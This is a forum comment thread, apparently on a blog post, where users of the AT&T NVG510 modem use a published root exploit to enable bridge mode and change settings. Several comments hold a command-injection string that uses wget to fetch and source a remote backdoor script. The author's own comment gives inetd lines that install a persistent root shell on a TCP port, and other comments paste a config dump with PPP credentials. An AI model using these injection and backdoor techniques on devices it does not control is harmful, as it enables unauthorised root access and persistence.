if your prompt looks like this... "NOS/XXX>" those commands you entered won't work as if your prompt looks like that you need to make sure it looks like this "Axis/1234565678>" before you can do the 'set link[1] etc etc' stuff. so basically... if you are at that "NOS/XXX" type of prompt you need to type in the following... "!" (without the " and hit enter) and then type in "nsh" (without the " and hit enter) then you should be at that Axis prompt. then after you are there you can type in your commands (i.e. set link[1] etc) and then after that's done do the whole 'validate' 'apply' 'save' commands in that order. then after that's done, reboot the router and all should be good. but you won't be able to run the 'save' command unless you're ethernet line is connected on ports 2/3/4 since port 1 will act as PPP now (if you did these commands using Port 1 on the NVG510 i just
11/8/2013 5:50:13 PM
Anonymous
to add to my above post to Brock...

if you did these commands using Port 1 on the NVG510 i just... remove ethernet from port 1 and plug it into port 2 (or 3 or 4) and log back into the router, get to Axis prompt, and run the 'save' command and then reboot the router and all should be good. just make sure the 'save' takes effect before rebooting though and you should be fine.
11/8/2013 5:56:01 PM
Earlz
@Anon, he's talking about the NVG510 Fixer app, which makes things quite a bit easier. but he might be right @Brock. Is your android device connected to the NVG510's wifi, or another wifi AP? Make sure that your other wifi access point is plugged into the NVG510 via an ethernet port other than port 1
11/8/2013 6:19:38 PM
Earlz
If that isn't the problem, please email me at earlz -AT- earlz dot net
11/8/2013 6:20:36 PM
Brock
I'm actually doing this over wifi with the NVG510 Fixer via my Android phone. I did a factory reset of the Uverse router and completed the Bridge Mode - looks like it worked this time. Thanks Anon!
11/8/2013 7:08:32 PM
ThaCrip
actually those three Anonymous posts below the 'ThaCrip' name are me as i just forgot to change the Anonymous to ThaCrip before i posted.

but anyways... i thought that might be the issue for Brock as i remember when i first did the previous exploit prior to the current one about a month ago that i simply missed that small but important step and i was wondering why it was not working and then started from the beginning and was reading the instructions a bit more carefully and noticed i missed that small step which is a show stopper if it's not on the Axis screen as i could see some people missing that step if they don't read carefully.

but glad you got it fixed though Brock and thanks again to Earlz for the permanent solution as it will be nice to still be able to configure the router to basically act as PPP mode etc even after factory reset or if AT&T forces a firmware upgrade on us and blocks the current exploit again in the future. but like i was saying given my time using it without the exploit insta
11/8/2013 8:55:11 PM
Brock
Thanks for your time guys - It still didn't solve my problem trying to setup a VPN... *sigh* What a pain, but I don't guess it's the modem's fault!
11/8/2013 10:00:17 PM
Ralph
Thanks! It worked for me! I just used putty and used the 192.168.1.254 ip and changed ssh to telnet and changed the port 28. Thank you so much! You rock! It worked for my NVG510.
11/8/2013 10:42:38 PM
ThaCrip
@ Brock ; from what it shows in the topic it appears when the PPP is setup it's a straight feed from AT&T servers directly to whatever you got connected to port 1 which is going to be the router. so it's like the NVG510's firewall etc is not even there i believe as it don't seem to be interfering with open ports on my torrent program which i already have properly forwarded on my main network.

@ Ralph ; i used Putty myself to as the exploit only seems to work if the NVG510 is on that 192.168.1.254 address since i imagine that's where the web page is programmed to access. so i just connected the NVG510 to my PC's ethernet port directly and got the exploit up and running and then changed the NVG510's IP to 192.168.0.1 since my main router (running DD-WRT) is 192.168.1.1 and then i can access the NVG510 configuration through the router now as long as the ethernet cable from the routers WAN port is plugged into ports 2/3/4 on the NVG510.
11/9/2013 12:04:15 AM
Earlz
Yea, it's possible for the exploit to work as different IP addresses, but I just haven't bothered. If you want to have it work on a different IP you can save the control2.html page to your computer, open it up in notepad, and replace all of the "192.168.1.254"s with whatever IP you intend to target
11/9/2013 12:46:21 AM
Ralph
Remember to do: set mgmt.lan-redirect.enable on and set mgmt.upnp.enable on if you are using magic
!
nsh
11/10/2013 3:23:52 AM
Ralph
I mean: mgmt.lan-redirect.enable off
11/10/2013 3:24:57 AM
Ralph
set mgmt.lan-redirect.enable off
11/10/2013 3:25:28 AM
ThaCrip
@Ralph ; i did the "set mgmt.lan-redirect.enable off" and the whole changing port 1 (i.e. set link[1] and link[2] etc) to act like a bridge mode so that the NVG510 just passes the internet connection from AT&T servers through the NVG510 directly (on Port 1) to my main router's WAN port so that can handle the connection/traffic.

i never bothered with the UPNP command as i don't think it's really needed but primarily the commands above seem to be what this exploit is worth installing for.
11/10/2013 6:10:40 AM
Ralph
I think that upnp is really for gaming which I can't do since my internet is 768k Basic.
11/10/2013 11:29:05 PM
ThaCrip
that's the thing... even if UPNP is, i think the direct connection to AT&T servers (with the whole set link[1] and set link[2] etc) bypasses all of the port/firewall etc stuff on the NVG510 modem to where your router that you got connected to the NVG510 takes care of it so if that's setup correctly with port forwarding etc then the NVG510 don't need any changes. because if that's truly a 'bridge mode' (which apparently it is according to Earlz) then what i said should be correct.

side note: even with a 768k connection you should be able to play games online just as long as no one else is using your internet line during your gaming as that's the way mine was as i had 40KB/s (i.e. 384kbps) DSL connection at one point in the past (now it's 175KB/s (maybe 180-200KB/s at best)) and it worked fine as long as no one was using the line while i was playing otherwise pings go out the window.
11/11/2013 3:26:43 AM
Ralf
I fixed up mine as well and enabled UPNP as well and it works. Turned off redierct and enabled bridege. Works fantastic.
However something broke during the firmware upgrade prior to that because my upload speeds dropped to 1/3. Dug out the old 2210-02 and uploads are normal.

NVG510 retired!
11/11/2013 3:44:34 AM
Ralf
My NVG510 must be broke or they did that on purpose. I have 18 meg down and 1 meg up. But for some reason AT&T doesn't offer that anymore around here. They only offer 12 meg now fro new customers. I still have my 18 though.
11/11/2013 3:51:15 AM
Ralf
I have a feeling though that there could be another update soon, because they also disabled IPv6. At some point it will get re-enabled again. I would just like to know how important IPv6 is so far.
11/11/2013 3:10:20 PM
Earlz
Yea, I was actually considering hoarding the exploit and not releasing it so that they couldn't put in a security update when they reenable IPv6.. but meh. I'm getting a few worrying reports that the NVG589(very similar to NVG510) has this latest exploit patched in some version of it's firmware already.. ugh If you're on U-Verse with this modem, I have one recommendation for the future: Use a different ISP, one that allows you to truly bridge past the modem. 
11/11/2013 4:41:05 PM
ThaCrip
@ Earlz ; i would have assumed this recent exploit would not be patched for at least a few months given they seem to slack off in general. but apparently when it comes to screwing over their customers they prefer to patch stuff quickly but when it comes to helping them they just leave their firmware faulty as hell for months as i can't believe they would release those NVG510 modems to the general public a while ago when they had those connection problem warning screens (which should have never been there in the first place) as that completely ruins your internet experience since you almost spend more time messing with that then actually using the internet and i can guarantee that will upset a ton of average users as their basic internet won't even function reliably for long before that comes up and then you got to clear browser cache etc and pray it holds out which the average user will most likely end up calling AT&T's tech support 24/7. but as long as they fixed that and the internet is at least useable (an
11/11/2013 10:37:11 PM
ThaCrip
continuation to my above post...

at least useable (and it appears they did (or mostly did)) then it's pretty much good enough for most users.

either way, at least i got this recent exploit (which is supposedly permanent?) installed before they patch anything as even if their stock NVG510 modems work now i prefer to have my router do the WAN communication to bypass any BS on the NVG510's side of things.

so thanks again for releasing this exploit, those of us who can install it appreciate it ;)
11/11/2013 10:39:35 PM
Ralph
Unfortunately, the only other option I have is satellite internet which has very low caps and is very expensive. Thanks for releasing the exploit!
11/12/2013 4:34:15 AM
Ralph
Also, I didn't bridge my modem. I just change the settings so that my Internet works. Thanks.
11/12/2013 4:36:07 AM
Qwerty
Ralph @ 11/8/2013 10:42:38 PM

You are saying you got SSH working? How did you get it to work exactly?
I'm not familiar with this stuff but could you establish an SSH tunnel for web browsing?

Here is what happens when I try to set the port.

Axis/SERIALNUMBER> set mgmt.shell.ssh-port 22
set: Permission denied
11/15/2013 9:02:47 PM
Qwerty
set mgmt.remoteaccess[4].port 22
validate
save

The above commands went through but didn't appear to open a port.
Used putty with IP 192.168.1.254 PORT 22. Also used a website to check if an external port was open on port 22 but it failed to confirm that port 22 was open.
11/15/2013 9:13:58 PM
Qwerty
NOS/SERIALNUMBER> remote-access start ssh
Started remote access for ssh

NOS/SERIALNUMBER> remote-access status ssh
ssh remote access: enabled      number of active clients: 0

Tested the port on WAN side and LAN side. I'm out of ideas.
11/15/2013 9:25:09 PM
Earlz
I remember SSH worked in previous versions of the NVG510 firmware. I'll test it out tonight and see if I can coax it into working. Also, ensure that your modem isn't bridged. 
11/15/2013 9:36:09 PM
Dr Frag
Hey guys, what about this command?  set conn[2].dhcpc.dns-enable off
I set that, then configured Google DNS addresses and restarted the NVG510.  The DNS addresses on the Broadband Status page still show 8.8.8.8, 8.8.4.4
FYI, I'm using Passthrough/Manual mode as well as redirect disabled, "TrueBridgeMode", DHCPS off, all firewall off, with a 12x1 Mb connection.
Although my static IP is not working but that may be because this laptop is connected to port 2 and I will have to wait till after hours to enable the connection on our Netgear ProSafe router on port 1.

DF
11/16/2013 1:05:06 AM
Ralph
No. I didn't get ssh to work unfortunately.
11/16/2013 8:13:38 AM
Ralph
Well, I edited the numbers in /etc/resolv.dnsmasq completely to a non-AT&T dns.

set ip.dns.primary-address   208.67.220.220
set ip.dns.secondary-address 208.67.222.222
set ip.dns.ext-address1 8.8.8.8
set ip.dns.ext-address2 8.8.4.4

Turned Power Save Off.
set phy.dsl.power-save.enable off
Used these other commands:
set mgmt.cwmp.enable off
set ip.dns.domain-name resolver1.opendns.com
set ip.dns.proxy-enable on
set ip.dns.override-allowed on
set ip6.enable off
Turned QOS Off since you can't set it in the Modem/Router:
set phy.dsl.atm.vc[8].qos-enable off
set phy.ensw.qos-mode off
11/16/2013 8:43:33 AM
Ralph
I also set the MTU to 1492 since it's better for the dsl without PPOE.
11/16/2013 8:44:45 AM
Ralph
Change:
set ip.dns.override-allowed off because it will overwrite the dns if not.

Don't do:
set phy.dsl.atm.vc[8].qos-enable off
set phy.ensw.qos-mode off

If you mess up, do a factory reset. If it still doesn't work, it's probably a line issue.
11/16/2013 10:52:26 AM
Ralph
Enable Allow Override first, Edit the 4 dns addresses, then Disable Allow Override.
11/16/2013 10:57:19 AM
Ralph
I wouldn't disable qos because I don't know if it's for at&t or yourself. Also, I had four dns  entries in /etc/resolv.dnsmasq two of them at&t causing problems. I have heard power saving causes issues for some too and an article somebody was having dns issues related to mgmt.cwmp.enable which is related to set mgmt.cwmp.periodic-inform.enable off which disables firmware updates if you add that too.
11/16/2013 11:05:54 AM
Anonymous
 
				
			
11/16/2013 7:02:25 PM
Att tech
KISS get yourself a 3rd party router from anywhere(any other router is better than the one in the nvg510) and go to firewall(192.168.1.254) copy the MAC address from device list set for specific MAC address.  Let the cheap router take over and you will have very little trouble. Google nvg510 3rd party router instructions
11/16/2013 7:06:50 PM
Att tech 2
Just FYI nvg510 is not Vdsl.it is a adsl modem which is basically dsl,the only difference is when they switched dsl to uverse they now stream the signal ip,so it is capable of higher speeds than regular dsl.i agree the nvg510 is a crap modem and thank you for the android app it helps a lot in the field.also the nvg589 is a bonded pair Vdsl modem,it is actually a way better modem than the 510,it has an n wireless router not the crappy g.vdsl modems are for fiber to the neighborhood and also work for fiber to the premise.the 510 still gets its signal from the central office.hope this clarifies a little and thanks again for the override app for ip diagnostic redirect page.
11/16/2013 8:28:06 PM
Earlz
I also recommend a third part router. Note though that the bridging solution built into the NVG510 isn't a true bridge. You can still overflow it's NAT tables etc, and I personally had problems where the NVG510 would randomly forget that traffic should go to the router until I rebooted it every week or so
11/17/2013 4:32:19 AM
usna1970
Ran control2 page with nonce string and restarted router. No luck getting telnet to connect to the router. o 192.168.1.254 [28] 
 Any ideas?
11/21/2013 6:00:22 AM
Earlz
What did the router say afterwards, what firmware version is on your modem, and are you using an NVG510? 
11/21/2013 2:55:21 PM
usna1970
Router is NVG510 firmware 9.0.6h2d30. Reset router to Default factory settings and tried again. When I run the sh with the nonce value it activates the command and returns me to the router update page. The router update page says "Firmware image is invalid" in Red font. After I restart the router and try to telnet I get the telnet message cannot connect to 192.168.1.254 on port 28. Any idea what I'm doing wrong? Do I need to do anything with my ie settings for telnet to interface correctly? I'm allowing all popups and cookies.
11/22/2013 6:15:39 PM
usna1970
Finally got to Telnet login in and password. After entering password I get "Axis/62035362922576 any idea what's going on?
11/22/2013 6:43:07 PM
ThaCrip
@ usna1970 ; yeah, that's the screen you want it to get to is that 'Axis/xxxxxx' screen. after you are there you should be able to type in the commands you want which is explained in the topic. just follow the stuff carefully and you will be fine.

just remember the 'validate' / 'apply' / 'save' commands after you do all of the 'set etc etc' stuff and if you are going to use the bridge mode it's best to make sure you are connected to either ports 2/3/4 before doing that command otherwise you won't be able to do the 'save' command without reconnecting the ethernet cable to port 2/3/4 of the router etc.
11/22/2013 8:50:23 PM
pavale
Need help!

I rooted my NVG510 more than 1 years ago, and it always worked good.

But this morning, I noticed it get rebooted, seems like rebooted by AT&T, and I can still telnet to the shell, but I can't enter the bash shell or nsh anymore. Can anyone help? Thank you very much.


login: admin
Password:

Terminal shell v1.0
Copyright (C) 2011 Motorola, Inc.  All rights reserved.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
ADSL capable
(admin completed login: Admin account with read/write access.)

NOS/SERIALNO> magic

Warning: Accessing these commands is restricted, and will affect normal
operation of this device. Exit now if you entered by mistake.NOS/SERIALNO/DEBUG/MAGIC> !Unrecognized command. Try "help".NOS/SERIALNO/DEBUG/MAGIC> exitNOS/SERIALNO/DEBUG> exitNOS/SERIALNO> nshYou are not authorized to perform this function.NOS/SERIALNO>
11/22/2013 9:29:28 PM
Anonymous
@pavale  same issue here.  Can't get past ! command.
11/22/2013 10:50:03 PM
chipchoco
Same here.
Do you have a suspicious reboot on the router? Hmm, who did that and why do they want to reboot my router......
11/22/2013 11:19:52 PM
Ralph
Did you guys try the new root method? The old one no longer works.
11/23/2013 12:25:22 AM
ThaCrip
@ pavale ; like said above the old method does not work anymore. so use the new method. also, check to make sure you got the same firmware that the topic says works with this new hack.

also, i noticed it says "NOS/xxxxx" as you need to be on the "Axis/xxxxx" screen in order to get commands to work. read the instructions carefully as it shows you how to get to the Axis screen.
11/23/2013 1:04:34 AM
Earlz
@pavale yes they patched the shell so that you can no longer reach a root shell from it. Follow the instructions here for the new exploit to to get to root shell again.
11/23/2013 1:26:03 AM
chipchoco
I own the NVG510 device, who gave their right to upgrade firmware on my device in midnight while I'm sleeping? 

They can say something like if you don't upgrade the firmware AT&T will stop providing services. 

But how can they upgrade firmware on my device and reboot it?

Does anyone has any idea how to stop them doing this either in technique ways or social engineering way?

Thanks.
11/23/2013 2:23:08 AM
Anonymous
my NVG510 is 172.16.0.1  Do I need to change it back to 192.168.1.254 for this to work?
11/23/2013 3:32:41 AM
Anonymous
got it.  downloaded the complete control 2.html and edited o 172.16.0.1
11/23/2013 3:52:11 AM
DustinDwayne
Does anyone know what mgmt.shell.unlock is for?
11/23/2013 3:54:55 AM
Earlz
I have not seen that option before. It must be new in the last firmware update. My only recommendation is to try it and see what it does :) 
11/24/2013 5:00:36 AM
Anonymous
I've got ssh working fine and I'd like to be able to use scp to copy files to/from the device. Unfortunately, scp does not know to send "magic" and "!" after authenticating and it is not expecting the output from the nvg510's cshell. Does anyone know how to make scp work? I tried creating another user, admin2 with /bin/ash as it's shell but that also failed to work. 
11/26/2013 3:49:04 PM
Earlz
I don't think scp will work because the version of SSH included is extremely minimal. You might try doing a permutation of my recent backdoor script to activate SSH (note, disable SSH before doing this)

echo 29ssh stream tcp nowait root /usr/sbin/telnetd -i -l /bin/ash > /var/etc/inetd.d/ssh29
pfs -a /var/etc/inetd.d/ssh29
pfs -s

and then reboot. Then connect to ssh on port 29. Again, no idea if this will work, but maybe worth a try? 
11/26/2013 6:51:39 PM
Earlz
er, not /usr/sbin/telnetd.. use /usr/sbin/dropbear or some such
11/26/2013 6:52:10 PM
Anonymous
Can i use this modem for comcast intenet? I switched from u verse att to comcast and was wondering if i can just connect it or i need a new wireless modem/ router 
11/29/2013 4:45:28 PM
ThaCrip
@ Anonymous ; Comcast uses a cable connection and AT&T use a DSL connection (i.e. different type of physical connection to the modem itself).

so no, you won't be able to use this modem with Comcast.
11/30/2013 9:49:14 PM
MrH
My 510 started flashing all 8 led's red last week.  I have never done any hacks to it but wonder if it would be possible to do so now.  ATT are sending another unit to replace for $100 fee.
Is this unit completely bricked?
12/3/2013 7:05:03 PM
WannaCompile
I'm trying to build a toolchain to do some cross-compiling. I'm following the instructions on sourceforge not having success. Can someone who has successfully built the toolchain give some pointers? Thanks.

@MrH I'd start right away with hacking it.
12/4/2013 1:25:51 AM
Earlz
@MrH sorry I have no idea. If you can get to the web interface, it may be possible to rescue by reinstalling the firmware.. but if it's blinking red, that usually means it's bricked

@WannaCompile I've also tried to do this, but it uses an old version of everything that has bitrotted enough that I couldn't get it to compile on my modern Arch Linux box. I believe they provide a precompiled toolchain somewhere as well. 
12/4/2013 1:48:08 AM
WannaCompile
I changed the config to use version 2.19 instead of 2.18 of binutils and finally got past that part and now I'm getting a "mixed implicit and normal rules" error in the section "Installing C library headers / start files".
12/4/2013 2:07:26 AM
Anonymous
By putting the modem device IP on the same subnet as the router, and disabling modem DHCP, then connect a cable from the router LAN port to the modem LAN port [2,3, or 4], you can access the modem config page in bridge mode, that is when router WAN port is connected to the modem LAN-1 port.
12/12/2013 1:58:47 AM
Anonymous
A member on DSL report said there is a more elegant solution to access modem in bridge mode with a single cable, however that involves VLAN and trunking. I have not upgrade my router to support VLAN yet.
12/12/2013 2:00:36 AM
Anonymous
so how do I stop att from performing remote upgrades on my nvg510 firmware and screwing everything up? thought I read this somewhere
12/12/2013 9:35:00 AM
Jerry
I could be wrong, however I read if you use true bridge mode, ATT would not be able to upgrade the firmware, as the software on the modem has no internet access.
12/12/2013 5:58:50 PM
Earlz
@Anons for VLAN, I've not messed with it. I think it's possible, but might require a switch capable of handling VLANs. If you get something to work, you could email me though and I could post it here to help others

@Jerry/anon, I'm pretty sure that this is the case. It's also possible to firewall off the management port they use for updates, but I've not tried to do this
12/12/2013 6:32:22 PM
mateor
I saw the comments that there was a possible firmware upgrade that could patch an exploit used to get root- but I am still going to try this. Thanks for the write-up!
12/20/2013 2:48:35 AM
Ronaldwal
My name is Ronald. Am new here. Am getting a lot of help from this forum.
12/26/2013 9:20:11 PM
martin
Hey Earlz
i tried your pages but no success here is the modem info and output from the "Save" button action (one requiring nonce value)

NVG510 INFO
System Information

Manufacturer	Motorola
Model Number	NVG510
Serial Number	62035353750944
Software Version	9.0.6h2d21
MAC Address	38:6b:bb:39:4d:a1
First Use Date	Used - Time Pending
Time Since Last Reboot	00:00:25:09
Datapump Version	A2pD035b.d23i
Legal Disclaimer	Licenses


SCRIPT OUTPUT
    0K                                                           1.09 MB/s

00:27:10 (1.09 MB/s) - `/tmp/backdoor.sh' saved [184]sh: /tmp/backdoor.sh: line 1: HTTP/1.0: not foundsh: /tmp/backdoor.sh: line 2: Location:: not foundsh: /tmp/backdoor.sh: line 3: Pragma:: not foundsh: /tmp/backdoor.sh: line 4: Content-Type:: not foundsh: /tmp/backdoor.sh: line 5: : not foundsh: /tmp/backdoor.sh: line 6: syntax error: unexpected redirectionHTTP/1.0 302 FoundLocation: /cgi-bin/update.haPragma: no-cacheContent-Type: text/html<html><meta h
1/6/2014 12:51:45 AM
Earlz
@martin it's possible you may be stuck in the redirect loop thing. Ensure that when you visit a page in your web browser you don't get the "possible connection issue found" page. If so, click continue so that your web browser shows you the actual page you're visiting. 

Afterwards, retry the instructions for the backdoor
1/6/2014 2:37:29 PM
Baylink
Just to confirm: once the modem's been put in bridge mode, ports 2-4 and WLAN can reach the modem's command interface, but nothing else, and port 1 is in "real" Bridge Mode to the WLAN, and can't see the rest, is that correct?  So once I enable bridge mode, the only way to manage the modem is via the app and WLAN, or telnet *from a local PC on ports 2-4*?
1/7/2014 4:43:44 PM
Earlz
Yes, that is correct @Baylink. 
1/7/2014 4:55:20 PM
Anonymous
Ok, well my friend who's stuck with the thing can get out to the net through the wifi, so bridge can't be on; telnet says it's already on, but I can't telnet to :28, and the public address doesn't appear to be CGN; 172.11/16 is a publicly routed address, right? 
1/7/2014 4:57:27 PM
Baylink
Yup, looks like:

http://dnstree.com/172/11/50/

(Cool site, BTW.)

Well, it looks like we may be SOL.  She's not equipped to handle the telnet session, I don't think, and I can't get to it.  <pout>  :-)
1/7/2014 4:59:30 PM
Earlz
yea, the port 28 telnet will only be accessible from within the LAN. Although, if it's bridged, you shouldn't be able to access the internet through wifi. 
Hope it all resolves :) 
1/7/2014 6:03:15 PM
Anonymous
Hey earlz, thanks for the instructions. I just got DSL service and an NVG510 and am trying to enable bridge mode to use my own router. I successfully used the exploit to install the telnet client, but when I login to the router that's when things go weird.

I connect to the IP and I'm asked for the login and password, but then I get immediately dumped to the "Axis/#######>" shell prompt. I don't get the whole info block after logging in like your example. I input the "magic" command and I get an output saying (poof!)

I tried using the "set" command to change the link parms, and I get "set: Another client has the SDB write lock". Any idea how to remove that?

My modem came with the 9.0.6h2d30 fw. Any ideas what might be going on here?
1/8/2014 12:08:06 AM
Anonymous
I posted the previous Anonymous comment... I got it figured out and now my router is handling the actual routing, like it should be! Thanks Earlz!
1/8/2014 12:26:31 AM
martin
@earlz
yup, the modem works fine, browsing works fine.
1/13/2014 4:34:31 PM
Anonymous
Thread with a 589 fw link; looks like the real deal. Can that help?

http://www.dslreports.com/forum/r28948370-Help-with-eBay-NVG589
1/13/2014 7:01:45 PM
Earlz
I have the NVG589's firmware, and I've tried to analyze it as much as I could, but I really need hardware to know what I'm really dealing with. When I first created this exploit, I asked some people with NVG589's to test the exploit, most didn't reply and those that did said it worked. But then since publishing I've been getting numerous reports that it's not working, so idk. 
1/15/2014 3:44:49 AM
shaun
Earlz, I tried your true bridge mode and the nvg510 still pulls the same public ip as always for itself, while my ddwrt router pulls a slightly different ip on a different subnet that goes nowhere. Also, my link dump has a third set of entries, link[3], which seem to be for the actual dsl port.

link[1].type                   = ethernet
link[1].igmp-snooping          = off
link[1].mtu-override           = 0
link[1].port-vlan.ports        = lan-1 lan-2 lan-3 lan-4 ssid-1 ssid-2 ssid-3 ssid-4
link[1].port-vlan.priority     = 0
link[2].type                   = ethernet
link[2].mtu-override           = 0
link[2].supplicant.type        = eap-tls
link[2].supplicant.qos-marker  = AF1
link[2].supplicant.priority    = 0
link[2].port-vlan.ports        = vc-1
link[2].port-vlan.priority     = 0
link[2].tagged-vlan[1].ports   = ptm
link[2].tagged-vlan[1].vid     = 0
link[2].tagged-vlan[1].priority = 0
link[3].type                   = ppp
link[3].mtu-override           = 0
link[3].ppp-lcp.sub-link-oid   
1/16/2014 11:18:07 PM
shaun
link[3].type                   = ppp
link[3].mtu-override           = 0
link[3].ppp-lcp.sub-link-oid   = WAN
link[3].ppp-lcp.auth-type      = on
link[3].ppp-lcp.username       = attreg@att.net
link[3].ppp-lcp.password       = attreg
link[3].ppp-lcp.magic-number   = on
link[3].ppp-lcp.protocol-compression = off
link[3].ppp-lcp.max-failures   = 5
link[3].ppp-lcp.max-configures = 10
link[3].ppp-lcp.max-terminates = 2
link[3].ppp-lcp.restart-timer  = 3
link[3].ppp-lcp.connection-type = always-on
link[3].ppp-lcp.lcp-echo-request = on
link[3].ppp-lcp.lcp-echo-failures = 7
link[3].ppp-lcp.lcp-echo-interval = 30
link[3].ppp-lcp.mru            = 1492
link[3].ppp-lcp.peer-dns       = on
link[3].ppp-lcp.debug          = off
link[3].pppoe.service-name     =
link[3].pppoe.ac-name          =link[3].pppoe.sync             =I hit the line break limit, this is after I reverted to default so I know that the two entries of interest are unmodified here.
1/16/2014 11:19:32 PM
shaun
argh, those last three lines are all set to a null value, having a hard time with the comment form.
1/16/2014 11:21:13 PM
Ralph
I bought the NVG510 application in the play store and just wanted to say: A Big Thank you! The tech gave me a pair upgrade so that my speed is now 3mb. I am using a new modem which is a Pace. I don't need to the application anymore or the help anymore but Thank you very much for helping along the way. :)
1/21/2014 7:25:38 PM
James
FWIW when I installed the hack I lost connectivity to the WLAN. It said WLAN waas down and I got a a red light.  BUT resetting to defaults fixed the connectivity I just had to reinput my WIFI password.  Not sure why but it might help some.
1/24/2014 2:36:28 AM
ThaCrip
@ Shaun ; i also have a DD-WRT router and i have the NVG510 setup on PORT1 to act as the WAN and Ports 2/3/4 act like a usual LAN port.

do this... reset the NVG510 connect your ethernet cable from the DD-WRT's WAN port to the PORT 2 on the NVG510 and then do the following (hit enter after each command) (i am just assuming you know how to get to proper screen in order to enter the following commands which it explains in the topic here)...

set link[1].port-vlan.ports "lan-2 lan-3 lan-4"
set link[2].port-vlan.ports lan-1
validate
apply
save

that should sum it up for you. after that's applied then you physically remove the ethernet cable that should currently be connected to LAN port 2 and plug it back into LAN port 1 which will now act like a direct connect to the AT&T servers. then you simply need to setup DD-WRT and all should be fine as i been running mine like that for a while now and in DD-WRT it shows my actual IP address instead of it's internet network of the usual 192.168.x.x variations.
2/2/2014 6:38:20 AM
Shaun
That is what I did, but in my case the NVG-510 continues to pull the working public IP, and the DD-WRT router pulls a different, non-working, but public IP.
2/5/2014 9:43:52 PM
awbaker
any word on DNS fix?
2/9/2014 11:05:28 PM
Anonymous
Found a manual with commands that looks interesting here is the link to it:
http://www.ron-berman.com/wp-content/uploads/2011/11/nvg510manual.pdf
2/15/2014 8:59:40 AM
gartral
interestingly enough, I've managed to use your rooting process to convert a NVG510 from an ADSL Modem into a sip client for use with my in-house asterisk server! haven't really tested it much yet, but in theory it should be all-good!
2/15/2014 6:30:21 PM
Anonymous
I followed the updated rooting instructions but I can't seem to reach the root shell. It just prints unrecognized command.
2/17/2014 3:04:20 AM
Tommy
Hi! It's not working for me, I get the following errors:

00:05:45 (1.65 MB/s) - `/tmp/backdoor.sh' saved [184]

sh: /tmp/backdoor.sh: line 1: HTTP/1.0: not found
sh: /tmp/backdoor.sh: line 2: Location:: not found
sh: /tmp/backdoor.sh: line 3: Pragma:: not found
sh: /tmp/backdoor.sh: line 4: Content-Type:: not found
sh: /tmp/backdoor.sh: line 5: 
: not found
sh: /tmp/backdoor.sh: line 6: syntax error: unexpected redirection
HTTP/1.0 302 Found
Location: /cgi-bin/update.ha
Pragma: no-cache
Content-Type: text/html

<html><meta http-equiv=Refresh content=0;url=/cgi-bin/update.ha>
<body></body></html>


I tried telnetting it with port 28, but it says "Could not open connection to the host, on port 28: Connection Failed"
2/18/2014 7:31:13 AM
Earlz
@Tommy your modem is intercepting it's own requests. Make sure to go to a web page and click the "continue" button when it redirects you to tell you about possible connection problems or whatever. You may also need to reboot your modem (and make sure you don't get the possible connection problem page after rebooting) 
2/18/2014 4:54:27 PM
MienTommy
@Earlz

I have tried doing this offline and online. 
Offline, it brings me to the update page and it just says "Invalid Firmware" and then I restart my modem and telnet is still not enabled. 
Online (connected via charter wifi), I get that error from my previous post.
I canceled my AT&T services and I want to use my AT&T router as a true-bridge network so any webpage displayed will not connect. I've tried hard resetting and still no luck. 
2/18/2014 5:09:05 PM
Anonymous
These parameters would be correct yes?

errrr && wget E:\Users\Tommy\Desktop\backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
2/18/2014 5:10:14 PM
MienTommy
I just tried it with this instead,

errrr && wget E:\Users\Tommy\Desktop\backdoor.nvg510.sh -O E:\Users\Tommy\Desktop\backdoor.nvg510.sh && source E:\Users\Tommy\Desktop\backdoor.nvg510.sh && errr

Still no luck. :/ 
2/18/2014 5:13:52 PM
Earlz
ahhh. I see. If you're not online with AT&T, you'll have to host the file on your local network. To do that, you'll have to run a webserver on your computer. And then you'll have to hook this computer to the NVG510 such that they have compatible IPs (if your NVG510 has 192.168.1.1, you'll need to have something like 192.168.1.123). And then you'll have to modify my HTML page to point to your IP address rather than my website, since the modem can't access it. 

You can email me at earlz at (this domain) if you need help 
2/19/2014 3:02:27 PM
Jaman
Earlz, I'm in a similar situation as the last poster. I'm not an ipdslam subscriber. So if I read your last post correctly I need to copy the source for the update page, edit it for a local computer running a web server, save it locally int the web browser to the edited file, then apply the patch?
3/6/2014 1:54:27 AM
Anonymous
Thanks =)
3/6/2014 9:24:00 AM
Blake222
First of all thank you for your efforts in working all of this out!  I decided to download the app for 2 reasons, first I always take the opportunity to give back to all of our 3rd party programers out there giving us such great software and fixes,  I recently worked for a programer who also used Xamarin, what a great tool, and have seen the work that goes into creating programs and appsl! It blew my mind how many programers around here do not use Xamarin, or even know of it... or they want to charge their customers double or triple to build an app three times so it has the ability to run on IOS, Android, and Windows. And secondly I have way too many projects started already! 
I have the NVG589 Router, bought the app and installed it on my Note 3 phone and my Samsung Tablet.  I was able to get the app to locate the router and connect, then after the warning about possible rebooting and internet loss, I was presented with the menu...good start!  I have attempted every task on the menu and they all ended the s
3/6/2014 5:53:19 PM
Blake222
 It seems to be failing at the point of login, 'Login appears to have been unsuccessful or this is not an NVG510".  I understand that there was no garuntee on the 589, I was just hoping you could help me out with finding another option or telling me if I even need to mess with it at all, and I do NOT want a refund! Consider that a Universal Thanks Contribution!!  To set up a Gigabit Network I recently purchased a Netgear GS105 and still have my old Vizio XWR100 router connected to the 589 which seems to work fine as a hub and the wireless is active and functioning . I have a WD MyBook Live 3TB NAS which is a where my problem lies as I have nearly 600 movies and 40K songs to transfer (which is why I am switching to gigabit). I am using my hacked "aTV Flash" Apple TV 2nd gen as my media server...still deciding on an app, maybe XBMC, PLex, or one of the others.  Finally my question!!  Everything I have just explained is new and in the process of being set up but I am still having speed issues so my media is taki
3/6/2014 6:10:47 PM
Anonymous
I'm interested in buying your app to support the time you've researched on it, and set up a bridge mode from an NVG510 to a Linksys EA6500. I'm not sure it'll work though, because once I telnet into the router according to the directions above, I cannot use "!" to elevate to root. Is that a problem you've seen before, and does your app rely on the "!" command working?
For reference, the response to the status command.
Motorola Netopia Model NVG510 Wireless-N ADSL AnnexA Ethernet Switch
Running Netopia SOC OS version 9.0.6 (build h2d30)
3/12/2014 5:46:40 AM
Earlz
umm.. both. So, the exploit has been changed so that it doesn't need that telnet shell. It now installs a backdoor telnet shell on port 28 that can reach a root shell and activate bridge mode and such. 
3/12/2014 6:45:27 AM
john
